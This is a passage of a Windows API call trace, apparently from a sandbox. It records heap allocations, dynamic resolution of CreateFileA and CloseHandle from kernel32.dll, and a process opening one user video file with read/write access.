(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.125] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ccb8 [0043.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ccb8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.125] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0043.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ccb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.126] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0043.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv", cchWideChar=64, lpMultiByteStr=0x7ab260, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv", lpUsedDefaultChar=0x0) returned 64 [0043.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.127] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\iebg h7.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=64, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=64, lpWideCharStr=0x7d5b30, cchWideChar=64 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv") returned 64 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.129] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.131] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0043.131] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.132] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0043.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.133] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889958 [0043.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889958, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.133] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0043.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.133] CloseHandle (hObject=0x140) returned 1 